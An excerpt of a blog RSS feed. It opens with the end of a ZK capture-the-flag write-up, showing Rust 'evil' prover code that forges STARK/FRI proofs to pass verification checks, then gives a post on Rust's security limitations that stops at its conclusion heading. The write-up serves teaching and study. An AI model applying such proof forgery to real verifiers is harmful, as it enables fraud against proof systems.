&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            trace_ood_evaluations.iter().flatten().cloned().collect(),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            round_1_result.trace_polys.len(),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        );&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let hz_exact_from_trace = step_2_evil_eval(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            air,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            domain,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            transition_coeffs,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            boundary_coeffs,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            &amp;amp;round_1_result.rap_challenges,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            z,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            &amp;amp;trace_ood_frame_evaluations,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        );&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        (hz_exact_from_trace, FieldElement::&amp;lt;F&amp;gt;::from(0))&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    };&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    Round3 {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        trace_ood_evaluations,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        composition_poly_even_ood_evaluation,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        composition_poly_odd_ood_evaluation,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Finally, round_4 is&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fn round_4_evil&amp;lt;F: IsFFTField, A: AIR&amp;lt;Field = F&amp;gt;, T: Transcript&amp;gt;(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    air: &amp;amp;A,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    domain: &amp;amp;Domain&amp;lt;F&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    round_1_result: &amp;amp;Round1&amp;lt;F, A&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    round_2_result: &amp;amp;Round2&amp;lt;F&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    round_3_result: &amp;amp;Round3&amp;lt;F&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    z: &amp;amp;FieldElement&amp;lt;F&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    transcript: &amp;amp;mut T,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;) -&amp;gt; Round4&amp;lt;F&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;where&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    FieldElement&amp;lt;F&amp;gt;: ByteConversion,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;{&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let coset_offset_u64 = air.context().proof_options.coset_offset;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let coset_offset = FieldElement::&amp;lt;F&amp;gt;::from(coset_offset_u64);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; &amp;lt;&amp;lt;&amp;lt;&amp;lt; Receive challenges: 𝛾, 𝛾&amp;#39;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let composition_poly_coeffients = [&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        transcript_to_field(transcript),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        transcript_to_field(transcript),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    ];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; &amp;lt;&amp;lt;&amp;lt;&amp;lt; Receive challenges: 𝛾ⱼ, 𝛾ⱼ&amp;#39;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let trace_poly_coeffients = batch_sample_challenges::&amp;lt;F, T&amp;gt;(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        air.context().transition_offsets.len() * air.context().trace_columns,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        transcript,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    );&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Compute p₀ (deep composition polynomial)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let deep_composition_poly = compute_deep_composition_poly_evil(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        air,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        domain,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &amp;amp;round_1_result.trace_polys,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        round_2_result,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        round_3_result,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        z,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &amp;amp;domain.trace_primitive_root,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &amp;amp;composition_poly_coeffients,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &amp;amp;trace_poly_coeffients,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    );&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let domain_size = domain.lde_roots_of_unity_coset.len();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; FRI commit and query phases&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let (fri_last_value, fri_layers) = fri_commit_phase(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        domain.root_order as usize,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        deep_composition_poly,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        transcript,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &amp;amp;coset_offset,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        domain_size,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    );&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let (query_list, iotas) = fri_query_phase(air, domain_size, &amp;amp;fri_layers, transcript);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let fri_layers_merkle_roots: Vec&amp;lt;_&amp;gt; = fri_layers&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .iter()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .map(|layer| layer.merkle_tree.root)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .collect();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let deep_poly_openings =&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        open_deep_composition_poly(domain, round_1_result, round_2_result, &amp;amp;iotas);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; grinding: generate nonce and append it to the transcript&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let grinding_factor = air.context().proof_options.grinding_factor;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let transcript_challenge = transcript.challenge();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let nonce = generate_nonce_with_grinding(&amp;amp;transcript_challenge, grinding_factor)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .expect(&amp;quot;nonce not found&amp;quot;);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    transcript.append(&amp;amp;nonce.to_be_bytes());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    Round4 {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        fri_last_value,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        fri_layers_merkle_roots,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        deep_poly_openings,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        query_list,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        nonce,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;This way, we generate a proof that will always pass the out-of-domain point consistency check and will have a high probability of passing the low-degree test.&lt;&#x2F;p&gt;
&lt;h1 id=&quot;summary&quot;&gt;Summary&lt;&#x2F;h1&gt;
&lt;p&gt;This post covered the challenges we presented at the first Lambda-Ingo ZK CTF and their solutions. The challenges involved some common attacks on Plonk (frozen heart and lack of blinding polynomials) and FRI to generate fake proofs or recover information from the witnesses. We will be adding more exercises and case studies to the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks_exercises&#x2F;tree&#x2F;main&quot;&gt;Lambdaworks exercises repo&lt;&#x2F;a&gt; so that anyone can learn how to build a proving system and some common pitfalls and vulnerabilities that may arise in their implementation. We would like to thank Ingonyama again for their fantastic work and all the sponsors at LambdaZK week in Paris. Stay tuned for more challenges on ZK!&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Please stop drinking the Rust Kool-Aid</title>
          <pubDate>Wed, 24 May 2023 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/please-stop-drinking-the-rust-kool-aid/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/please-stop-drinking-the-rust-kool-aid/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/please-stop-drinking-the-rust-kool-aid/">&lt;p&gt;We’ve been using Rust since 2014, and we’re big fans. That doesn’t mean Rust is a perfect language that solves all your problems. Security vulnerabilities come in a wide array of flavors. Some allow a malicious actor to take over a system. Others allow an attacker to peek at information they shouldn’t see. Smaller but still critical ones let a malicious actor shut down a service relatively cheaply. This kind of attack is called a DoS, a denial of service. Downed systems are expensive for real people. It’s even worse when the system shuts down without any external interference.&lt;&#x2F;p&gt;
&lt;p&gt;Some days ago, Péter Szilágyi, team lead at Ethereum, said that the C version of the KZG library crashed on some systems:&lt;&#x2F;p&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;twitter.com&#x2F;peter_szilagyi&#x2F;status&#x2F;1650608687810068480&quot;&gt;&lt;img src=&quot;&#x2F;images&#x2F;2023&#x2F;05&#x2F;twitter.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;If we want to build safe and robust systems, they need to take into account the possibility of crashes, whether they’re written in C, Rust, Erlang, or Java. Rust is one of the most widely used languages for building new high-performance systems.&lt;&#x2F;p&gt;
&lt;p&gt;Rust introduces a great new approach to memory management and prevents many categories of bugs at compile time. It prevents you from accessing invalid memory positions, dereferencing a null pointer, double-freeing memory, or using freed memory.&lt;&#x2F;p&gt;
&lt;p&gt;The concept behind this is excellent: don’t trust the programmer for this memory management when the compiler can do the hard work. The cost to pay here is that it is a bit harder to code.&lt;&#x2F;p&gt;
&lt;p&gt;If you have long-living software, e.g., a web server, a blockchain node, or something like that, a crash means that your system is out of service.&lt;br &#x2F;&gt;
For example, if you have a node receiving a request from the public, when you crash, you get your node off. That’s a vulnerability of your system.&lt;br &#x2F;&gt;
Resiliency comes not only from the lone program processing traffic and data, but also from the surrounding system that monitors it and from the state and error management within it. The key in this case is what happens when you have unexpected failures.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;memory-leaks&quot;&gt;Memory leaks&lt;&#x2F;h2&gt;
&lt;p&gt;&lt;strong&gt;Memory leaks&lt;&#x2F;strong&gt; are subtle bugs that are difficult to see and address.&lt;&#x2F;p&gt;
&lt;p&gt;A memory leak occurs when a program manages memory allocations in such a way that memory which is no longer needed is never released.&lt;&#x2F;p&gt;
&lt;p&gt;In Rust, it’s hard to create reference cycles, but you can do it &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;doc.rust-lang.org&#x2F;book&#x2F;ch15-06-reference-cycles.html&quot;&gt;with &lt;em&gt;Rc &lt;T&gt;&lt;&#x2F;em&gt; and &lt;em&gt;RefCell &lt;T&gt;&lt;&#x2F;em&gt;&lt;&#x2F;a&gt;. Rust does not guarantee the absence of memory leaks, even in safe code. When dealing with reference cycles, it’s easy to end up with a leak because neither of the two references is ever freed.&lt;&#x2F;p&gt;
&lt;p&gt;This situation can be hard to detect by inspecting the source code.&lt;&#x2F;p&gt;
&lt;p&gt;Many other situations can lead to a memory leak, such as functions running in async code (especially when you mix them with threads).&lt;&#x2F;p&gt;
&lt;p&gt;In a long-living program, many memory leaks can lead to a denial of service because the whole system can run out of memory.&lt;&#x2F;p&gt;
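As a sketch of how such a leak can arise in entirely safe Rust, the `Node` type below (a hypothetical type, invented for illustration) builds a two-element `Rc`/`RefCell` cycle; the strong counts show why neither allocation can ever be dropped:

```rust
use std::cell::RefCell;
use std::rc::Rc;

// Hypothetical node type: each node may point at another node.
struct Node {
    next: RefCell<Option<Rc<Node>>>,
}

// Build a two-node cycle a -> b -> a and report both strong counts.
fn cycle_strong_counts() -> (usize, usize) {
    let a = Rc::new(Node { next: RefCell::new(None) });
    let b = Rc::new(Node { next: RefCell::new(Some(Rc::clone(&a))) });
    // Close the cycle. From now on, each node is kept alive by the other.
    *a.next.borrow_mut() = Some(Rc::clone(&b));
    (Rc::strong_count(&a), Rc::strong_count(&b))
}

fn main() {
    // Both counts are 2: one reference from the local binding, one from
    // the cycle. Dropping the locals only brings each count down to 1,
    // so the destructors never run and the memory leaks -- in safe Rust.
    assert_eq!(cycle_strong_counts(), (2, 2));
}
```

No `unsafe` appears anywhere here, which is exactly the point: the borrow checker accepts this program without complaint.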
&lt;h2 id=&quot;error-handling-and-panic&quot;&gt;Error handling and panic&lt;&#x2F;h2&gt;
&lt;p&gt;Rust has some tools for error handling, encoding the error value in the &lt;em&gt;Result&lt;&#x2F;em&gt; enum. There are no &lt;em&gt;exceptions&lt;&#x2F;em&gt; like in other languages. On the other side, Rust has the concept of panicking.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;kgwvbvw.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Panics terminate the running program.&lt;&#x2F;p&gt;
&lt;p&gt;Rust prefers panics over undefined behavior, which is hard to track and debug.&lt;&#x2F;p&gt;
&lt;p&gt;That being said, a panic in Rust usually occurs when a condition that absolutely must not happen is reached.&lt;&#x2F;p&gt;
&lt;p&gt;Rust book has a section about panicking:&lt;br &#x2F;&gt;
&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;doc.rust-lang.org&#x2F;book&#x2F;ch09-03-to-panic-or-not-to-panic.html#to-panic-or-not-to-panic&quot;&gt;https:&#x2F;&#x2F;doc.rust-lang.org&#x2F;book&#x2F;ch09-03-to-panic-or-not-to-panic.html#to-panic-or-not-to-panic&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;The most obvious (and probably the most used) way of getting a panic is unwrapping a Result when it’s an Err.&lt;&#x2F;p&gt;
&lt;p&gt;Sometimes panics are hidden in harmless-looking operations, like accessing arrays by index with the &lt;strong&gt;[ ]&lt;&#x2F;strong&gt; operator (when the index is out of bounds) or doing mathematical operations (like dividing by zero).&lt;&#x2F;p&gt;
&lt;p&gt;It’s worth mentioning that the std has functions to avoid panics in such operations. For example, the &lt;em&gt;get()&lt;&#x2F;em&gt; method accesses an element by index and returns an Option value instead of panicking.&lt;&#x2F;p&gt;
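A small illustration of both the panicking and the non-panicking paths, using only standard-library calls:

```rust
fn main() {
    let v = vec![10, 20, 30];

    // Indexing with [] panics on an out-of-bounds index:
    // let x = v[5]; // would panic with "index out of bounds"

    // `get` returns an Option instead, letting the caller decide:
    assert_eq!(v.get(1), Some(&20));
    assert_eq!(v.get(5), None);

    // Checked arithmetic sidesteps the division-by-zero panic the same way:
    let d: i32 = 10;
    assert_eq!(d.checked_div(0), None);
    assert_eq!(d.checked_div(2), Some(5));
}
```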
&lt;h2 id=&quot;threads-safety&quot;&gt;Thread safety&lt;&#x2F;h2&gt;
&lt;p&gt;While Rust provides “&lt;em&gt;Fearless concurrency&lt;&#x2F;em&gt;,” the language doesn’t guarantee there won’t be bugs or security issues derived from concurrency.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Concurrency&lt;&#x2F;strong&gt; is about scheduling instructions between threads on the CPU (on one or more cores). This scheduling is arbitrary, and we call one possible order of execution of those atomic instructions across threads a scenario.&lt;&#x2F;p&gt;
&lt;p&gt;While we have checks that guarantee each thread only has access to the data we intend, with no accidental sharing of memory, we can still write code with deadlocks or race conditions.&lt;&#x2F;p&gt;
&lt;p&gt;The Rust compiler can’t check (at compile time) whether your multi-threaded program has a possible deadlock, so Rust doesn’t guarantee your program will not get stuck in a stalemate. In that situation, your program makes no progress.&lt;&#x2F;p&gt;
&lt;p&gt;For example, we could have a channel expecting data that never comes, blocking its thread. While this is easy to spot with one thread, if we have multiple threads using multiple channels and shared data with locks, this can be harder to see. In concurrency, this is called &lt;strong&gt;starvation&lt;&#x2F;strong&gt;.&lt;&#x2F;p&gt;
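As a sketch of how to keep a receiver from blocking forever, the standard library's `recv_timeout` bounds the wait and turns the stall into an observable error:

```rust
use std::sync::mpsc;
use std::time::Duration;

fn main() {
    let (tx, rx) = mpsc::channel::<u32>();
    // Nothing is ever sent on `tx`, so a plain `rx.recv()` would block
    // this thread forever. `recv_timeout` bounds the wait instead and
    // reports the stall as an error the caller can handle:
    let result = rx.recv_timeout(Duration::from_millis(50));
    assert!(result.is_err());
    // Keep the sender alive until here, so the error above is a genuine
    // timeout rather than a disconnect.
    drop(tx);
}
```

In a real service, the error branch is where monitoring, retries, or shutdown logic would go, instead of a silently stuck thread.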
&lt;p&gt;Quoting the Rustonomicon: &lt;strong&gt;Rust does not prevent general race conditions.&lt;&#x2F;strong&gt; A typical race condition occurs when you check a system condition and then take action based on it. This is called &lt;strong&gt;time-of-check to time-of-use&lt;&#x2F;strong&gt; (TOCTOU). Due to the interleaving of operations between threads, the state of the condition can change while another thread executes, so the action taken by the first thread is invalid (in other words, it decides with &lt;em&gt;old information&lt;&#x2F;em&gt;).&lt;&#x2F;p&gt;
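One way to close a TOCTOU window is to hold the mutex guard across both the check and the update, so no other thread can interleave between them. A minimal sketch (the `withdraw` helper is hypothetical, for illustration only):

```rust
use std::sync::{Arc, Mutex};
use std::thread;

// Hypothetical helper: withdraw `amount` only if the balance covers it.
// Holding the mutex guard across both the check and the update makes the
// check-then-act sequence atomic: no other thread can change the balance
// between the two steps, which is exactly the TOCTOU window.
fn withdraw(balance: &Mutex<i64>, amount: i64) -> bool {
    let mut guard = balance.lock().unwrap();
    if *guard >= amount {
        *guard -= amount;
        true
    } else {
        false
    }
}

fn main() {
    let balance = Arc::new(Mutex::new(100));
    let handles: Vec<_> = (0..10)
        .map(|_| {
            let b = Arc::clone(&balance);
            thread::spawn(move || withdraw(&b, 30))
        })
        .collect();
    let successes = handles
        .into_iter()
        .map(|h| h.join().unwrap())
        .filter(|&ok| ok)
        .count();
    // Whatever the interleaving, exactly three withdrawals of 30 fit in 100.
    assert_eq!(successes, 3);
    assert_eq!(*balance.lock().unwrap(), 10);
}
```

Had the check and the update each taken the lock separately, two threads could both see a sufficient balance and overdraw the account.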
&lt;h2 id=&quot;macros&quot;&gt;Macros&lt;&#x2F;h2&gt;
&lt;p&gt;Rust has a powerful macro feature. Macros can extend the language in places where the built-in functionality is too restrictive. For example, since Rust has a strongly typed system, the arguments of a function are fixed in number and type. With macros, we can have a function-style invocation with a variadic number and type of arguments. &lt;code&gt;println!&lt;&#x2F;code&gt; is the perfect example of that.&lt;&#x2F;p&gt;
&lt;p&gt;A good characteristic of Rust macros is that they are hygienic: the body of the macro is expanded and executed in the context of the macro itself, without capturing extra context from the code where it is invoked. This prevents the dangerous, unexpected, and hard-to-debug behavior that can happen in C programs due to accidental variable capture.&lt;&#x2F;p&gt;
&lt;p&gt;Having said that, overusing macros is harmful. First, macros slow down compilation. Worse, bad macro practices can make code hard to comprehend: in practice, macros introduce new “keywords” to the language and redefine some of its rules, and the fact that the same macro can accept multiple types can confuse the reader of the code.&lt;&#x2F;p&gt;
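A minimal `macro_rules!` sketch of such a variadic, multi-type, function-style invocation (the `join_all!` macro is invented here for illustration):

```rust
// Hypothetical macro, for illustration: a function-style call that accepts
// any number of arguments of any Display type and joins them into a String.
macro_rules! join_all {
    ($($item:expr),* $(,)?) => {{
        let mut out = String::new();
        $(
            out.push_str(&format!("{} ", $item));
        )*
        out.trim_end().to_string()
    }};
}

fn main() {
    // Mixed argument counts and types in a single "function" call --
    // something an ordinary Rust function cannot express:
    assert_eq!(join_all!(1, "two", 3.5), "1 two 3.5");
    assert_eq!(join_all!("only"), "only");
}
```

This flexibility is also the readability cost mentioned above: nothing in the call site tells the reader how many arguments, or which types, `join_all!` accepts.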
&lt;h2 id=&quot;unsafe&quot;&gt;Unsafe&lt;&#x2F;h2&gt;
&lt;p&gt;&lt;code&gt;Unsafe&lt;&#x2F;code&gt; in Rust is the key that opens the door to unchecked memory and variables. One of the strengths of the language is the borrow checker and its restrictions on how memory is used. &lt;code&gt;Unsafe&lt;&#x2F;code&gt; hands that power, and the responsibility that comes with it, to the programmer.&lt;&#x2F;p&gt;
&lt;p&gt;There are indeed circumstances where there is no choice. When Rust code interfaces with C code, FFI invocations are &lt;em&gt;unsafe&lt;&#x2F;em&gt;, given that C is an “unsafe” language from Rust’s perspective.&lt;&#x2F;p&gt;
&lt;p&gt;The use of unsafe makes our code more vulnerable (e.g., accessing an unchecked memory position is always dangerous).&lt;br &#x2F;&gt;
&lt;code&gt;Unsafe&lt;&#x2F;code&gt; blocks must be carefully audited.&lt;&#x2F;p&gt;
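&lt;p&gt;A minimal sketch of what the programmer takes on (a toy round-trip through a raw pointer; the helper name is made up for illustration):&lt;&#x2F;p&gt;

```rust
// Toy example: move a value behind a raw pointer and read it back.
// The borrow checker no longer tracks `p`; we must guarantee validity
// and free the allocation ourselves.
fn into_raw_and_back(v: i32) -> i32 {
    let b = Box::new(v);
    // Leak the box into a raw pointer: ownership tracking stops here.
    let p = Box::into_raw(b);
    unsafe {
        // Dereferencing a raw pointer requires `unsafe`.
        let value = *p;
        // Reclaim the allocation; forgetting this line would leak memory.
        drop(Box::from_raw(p));
        value
    }
}

fn main() {
    println!("{}", into_raw_and_back(42)); // prints 42
}
```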
&lt;h2 id=&quot;conclusion&quot;&gt;Conclusion&lt;&#x2F;h2&gt;
